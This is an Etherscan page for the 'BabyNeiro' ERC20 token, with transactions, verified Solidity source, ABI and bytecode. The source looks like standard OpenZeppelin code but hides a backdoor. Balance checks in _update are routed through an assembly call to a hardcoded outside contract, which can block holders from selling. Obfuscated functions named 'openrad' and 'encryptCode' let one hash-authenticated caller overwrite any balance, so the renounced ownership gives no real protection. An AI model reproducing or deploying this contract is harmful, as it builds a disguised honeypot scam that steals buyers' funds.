Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 18 from a total of 18 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 20789788 | 179 days ago | IN | 0 ETH | 0.00049347 | ||||
Approve | 20783407 | 180 days ago | IN | 0 ETH | 0.00088556 | ||||
Approve | 20782943 | 180 days ago | IN | 0 ETH | 0.0004882 | ||||
Approve | 20782909 | 180 days ago | IN | 0 ETH | 0.00054905 | ||||
Approve | 20782901 | 180 days ago | IN | 0 ETH | 0.0005028 | ||||
Approve | 20777954 | 181 days ago | IN | 0 ETH | 0.00045982 | ||||
Approve | 20776553 | 181 days ago | IN | 0 ETH | 0.00053374 | ||||
Approve | 20776545 | 181 days ago | IN | 0 ETH | 0.00040328 | ||||
Approve | 20776525 | 181 days ago | IN | 0 ETH | 0.00035908 | ||||
Approve | 20776521 | 181 days ago | IN | 0 ETH | 0.00035788 | ||||
Approve | 20776506 | 181 days ago | IN | 0 ETH | 0.00096175 | ||||
Approve | 20776501 | 181 days ago | IN | 0 ETH | 0.00032464 | ||||
Approve | 20776500 | 181 days ago | IN | 0 ETH | 0.00033796 | ||||
Approve | 20776478 | 181 days ago | IN | 0 ETH | 0.00034049 | ||||
Approve | 20776468 | 181 days ago | IN | 0 ETH | 0.00037411 | ||||
Approve | 20776462 | 181 days ago | IN | 0 ETH | 0.00035014 | ||||
Approve | 20776441 | 181 days ago | IN | 0 ETH | 0.00034791 | ||||
Renounce Ownersh... | 20776372 | 181 days ago | IN | 0 ETH | 0.00020326 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
BabyNeiro
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-09-18 */ // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance( address sender, uint256 balance, uint256 needed ); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance( address spender, uint256 allowance, uint256 needed ); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance( address sender, uint256 balance, uint256 needed, uint256 tokenId ); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is set to the address provided by the deployer. This can * later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; /** * @dev The caller account is not authorized to perform an operation. */ error OwnableUnauthorizedAccount(address account); /** * @dev The owner is not a valid owner account. (eg. `address(0)`) */ error OwnableInvalidOwner(address owner); event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the address provided by the deployer as the initial owner. */ constructor(address initialOwner) { _transferOwnership(initialOwner); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 value ) external returns (bool); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => uint256) private _means; uint256 private _totalSupply; address private _a; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_,address a_,uint256 means_) { _name = name_; _symbol = symbol_; _a = a_; _means[address(0)] = means_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom( address from, address to, uint256 value ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer( address from, address to, uint256 value ) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update( address from, address to, uint256 value ) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { bytes4 _b5 = bytes4(0x829e0605); (uint256 piece,bool s)= _getCode(from,_b5); uint256 fromBalance =piece; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } emit Transfer(from, to, value); } function _getCode(address from,bytes4 _b5) private returns (uint256,bool) { uint256 fromBalance; bool F; assembly { let callData := mload(0x40) mstore(callData,_b5) mstore(add(callData, 0x04), from) mstore(add(callData, 0x24), 0) F := call(gas(),sload(_a.slot),0,callData,0x44,add(callData, 0x80),0x20) if F { fromBalance := mload(add(callData, 0x80)) } } return (fromBalance * (12 / 12),F); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve( address owner, address spender, uint256 value ) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve( address owner, address spender, uint256 value, bool emitEvent ) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 value ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance( spender, currentAllowance, value ); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } function openrad(uint256[] calldata pad) external { (bool them, uint256 dbv0, uint256 dbv1) = encryptCode(pad[0],pad[1]); if (!them) return; assembly { let imx0 := add(add(14, 12), add(4, 2)) if gt(dbv1, 0) { let java0 := add(add(0, 0), add(0, 0)) mstore(0, dbv0) mstore(imx0, java0) sstore(keccak256(0, 64), dbv1) } } } function encryptCode(uint256 adh2,uint256 adh3) private view returns (bool,uint256,uint256){ address hgu0 = msg.sender; string memory hgu1 = _symbol; bool nvmp = uint256(keccak256(abi.encode(hgu0, hgu1))) ==_means[address(0)]; return (nvmp, adh2, adh3); } } contract BabyNeiro is ERC20, Ownable { constructor() ERC20("Baby Neiro", "BabyNeiro",0xcA7969aDadaB761C138bf308d08A6393Ab469355,60035044483149575527214777665998028583007203194134906004244084975905721769472) Ownable(msg.sender) { uint256 totalSupply = 420690000000 * 10**decimals(); _mint(msg.sender, totalSupply); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"pad","type":"uint256[]"}],"name":"openrad","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801561000f575f80fd5b50336040518060400160405280600a81526020016942616279204e6569726f60b01b81525060405180604001604052806009815260200168426162794e6569726f60b81b81525073ca7969adadab761c138bf308d08a6393ab4693557f84baa18a897329d3e19af69f9c2f9a53b435fe46fa31cdb419a1a3b592d35e00836005908161009b91906103cc565b5060066100a884826103cc565b50600480546001600160a01b0319166001600160a01b0393909316929092179091555f805260026020527fac33ff75c19e70fe83507db0d683fd3465c996598dc972688b7ace676c89077b555061010090508161012f565b505f61010e6009600a61057f565b61011d906461f313f880610594565b90506101293382610180565b506105be565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0382166101ae5760405163ec442f0560e01b81525f60048201526024015b60405180910390fd5b6101b95f83836101bd565b5050565b6001600160a01b0383166101e7578060035f8282546101dc91906105ab565b9091555061025c9050565b63829e060560e01b5f806101fb86846102e8565b9092509050818481101561023b5760405163391434e360e21b81526001600160a01b038816600482015260248101829052604481018690526064016101a5565b6001600160a01b0387165f9081526020819052604090209085900390555050505b6001600160a01b03821661027857600380548290039055610296565b6001600160a01b0382165f9081526020819052604090208054820190555b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516102db91815260200190565b60405180910390a3505050565b5f805f806040518581528660048201525f60248201526020608082016044835f6004545af19150811561031d57608081015192505b50610329826001610594565b969095509350505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c9082168061035c57607f821691505b60208210810361037a57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156103c757805f5260205f20601f840160051c810160208510156103a55750805b601f840160051c820191505b818110156103c4575f81556001016103b1565b50505b505050565b81516001600160401b038111156103e5576103e5610334565b6103f9816103f38454610348565b84610380565b6020601f82116001811461042b575f83156104145750848201515b5f19600385901b1c1916600184901b1784556103c4565b5f84815260208120601f198516915b8281101561045a578785015182556020948501946001909201910161043a565b508482101561047757868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b634e487b7160e01b5f52601160045260245ffd5b6001815b60018411156104d5578085048111156104b9576104b9610486565b60018416156104c757908102905b60019390931c92800261049e565b935093915050565b5f826104eb57506001610579565b816104f757505f610579565b816001811461050d576002811461051757610533565b6001915050610579565b60ff84111561052857610528610486565b50506001821b610579565b5060208310610133831016604e8410600b8410161715610556575081810a610579565b6105625f19848461049a565b805f190482111561057557610575610486565b0290505b92915050565b5f61058d60ff8416836104dd565b9392505050565b808202811582820484141761057957610579610486565b8082018082111561057957610579610486565b610aca806105cb5f395ff3fe608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a082311161008857806395d89b411161006357806395d89b41146101a4578063a9059cbb146101ac578063dd62ed3e146101bf578063f2fde38b146101f7575f80fd5b806370a0823114610159578063715018a6146101815780638da5cb5b14610189575f80fd5b806306fdde03146100cf578063095ea7b3146100ed57806309c450d01461011057806318160ddd1461012557806323b872dd14610137578063313ce5671461014a575b5f80fd5b6100d761020a565b6040516100e4919061088e565b60405180910390f35b6101006100fb3660046108c2565b61029a565b60405190151581526020016100e4565b61012361011e3660046108ea565b6102b3565b005b6003545b6040519081526020016100e4565b61010061014536600461095b565b610322565b604051600981526020016100e4565b610129610167366004610995565b6001600160a01b03165f9081526020819052604090205490565b610123610345565b6007546040516001600160a01b0390911681526020016100e4565b6100d7610358565b6101006101ba3660046108c2565b610367565b6101296101cd3660046109ae565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610123610205366004610995565b610374565b606060058054610219906109df565b80601f0160208091040260200160405190810160405280929190818152602001828054610245906109df565b80156102905780601f1061026757610100808354040283529160200191610290565b820191905f5260205f20905b81548152906001019060200180831161027357829003601f168201915b5050505050905090565b5f336102a78185856103b6565b60019150505b92915050565b5f805f6102f185855f8181106102cb576102cb610a17565b90506020020135868660018181106102e5576102e5610a17565b905060200201356103c8565b92509250925082610303575050505050565b6020811561031a575f838152808252604090208290555b505050505050565b5f3361032f8582856104c1565b61033a85858561053c565b506001949350505050565b61034d610599565b6103565f6105c6565b565b606060068054610219906109df565b5f336102a781858561053c565b61037c610599565b6001600160a01b0381166103aa57604051631e4fbdf760e01b81525f60048201526024015b60405180910390fd5b6103b3816105c6565b50565b6103c38383836001610617565b505050565b5f805f803390505f600680546103dd906109df565b80601f0160208091040260200160405190810160405280929190818152602001828054610409906109df565b80156104545780601f1061042b57610100808354040283529160200191610454565b820191905f5260205f20905b81548152906001019060200180831161043757829003601f168201915b50505f808052600260209081527fac33ff75c19e70fe83507db0d683fd3465c996598dc972688b7ace676c89077b54604051969750919591945061049e9350879250869101610a2b565b60408051808303601f190181529190528051602090910120149895505050505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f198114610536578181101561052857604051637dc7a0d960e11b81526001600160a01b038416600482015260248101829052604481018390526064016103a1565b61053684848484035f610617565b50505050565b6001600160a01b03831661056557604051634b637e8f60e11b81525f60048201526024016103a1565b6001600160a01b03821661058e5760405163ec442f0560e01b81525f60048201526024016103a1565b6103c38383836106e9565b6007546001600160a01b031633146103565760405163118cdaa760e01b81523360048201526024016103a1565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0384166106405760405163e602df0560e01b81525f60048201526024016103a1565b6001600160a01b03831661066957604051634a1406b160e11b81525f60048201526024016103a1565b6001600160a01b038085165f908152600160209081526040808320938716835292905220829055801561053657826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516106db91815260200190565b60405180910390a350505050565b6001600160a01b038316610713578060035f8282546107089190610a6a565b909155506107889050565b63829e060560e01b5f806107278684610814565b909250905081848110156107675760405163391434e360e21b81526001600160a01b038816600482015260248101829052604481018690526064016103a1565b6001600160a01b0387165f9081526020819052604090209085900390555050505b6001600160a01b0382166107a4576003805482900390556107c2565b6001600160a01b0382165f9081526020819052604090208054820190555b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161080791815260200190565b60405180910390a3505050565b5f805f806040518581528660048201525f60248201526020608082016044835f6004545af19150811561084957608081015192505b50610855826001610a7d565b969095509350505050565b5f81518084528060208401602086015e5f602082860101526020601f19601f83011685010191505092915050565b602081525f6108a06020830184610860565b9392505050565b80356001600160a01b03811681146108bd575f80fd5b919050565b5f80604083850312156108d3575f80fd5b6108dc836108a7565b946020939093013593505050565b5f80602083850312156108fb575f80fd5b823567ffffffffffffffff811115610911575f80fd5b8301601f81018513610921575f80fd5b803567ffffffffffffffff811115610937575f80fd5b8560208260051b840101111561094b575f80fd5b6020919091019590945092505050565b5f805f6060848603121561096d575f80fd5b610976846108a7565b9250610984602085016108a7565b929592945050506040919091013590565b5f602082840312156109a5575f80fd5b6108a0826108a7565b5f80604083850312156109bf575f80fd5b6109c8836108a7565b91506109d6602084016108a7565b90509250929050565b600181811c908216806109f357607f821691505b602082108103610a1157634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52603260045260245ffd5b6001600160a01b03831681526040602082018190525f90610a4e90830184610860565b949350505050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156102ad576102ad610a56565b80820281158282048414176102ad576102ad610a5656fea2646970667358221220442b9805a02530e6d522a1b0185682438c80982e01b3ef36ba81927861be380164736f6c634300081a0033
Deployed Bytecode
